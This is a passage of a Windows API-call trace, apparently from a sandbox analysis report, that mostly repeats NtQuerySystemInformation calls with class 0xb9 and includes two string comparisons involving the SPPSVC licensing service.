SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x28, ResultLength=0x0) [0208.273] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0208.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x28, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x28, ResultLength=0x0) [0208.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x28, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaf0, Length=0x20, ResultLength=0x0) [0208.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaf0, Length=0x20, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x28, ResultLength=0x0) [0208.283] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd40, Length=0x50, ResultLength=0x0) [0208.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0208.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x28, ResultLength=0x0) [0208.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x28, ResultLength=0x0) [0208.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x28, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaf0, Length=0x20, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0208.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc70, Length=0x38, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaf0, Length=0x20, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd540, Length=0x28, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0208.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x50, ResultLength=0x0) [0208.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4d0, Length=0x28, ResultLength=0x0) [0208.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd540, Length=0x28, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x38, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0208.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3e0, Length=0x20, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.538] NtQuerySystemInformation (SystemInformationClass=0xb9, 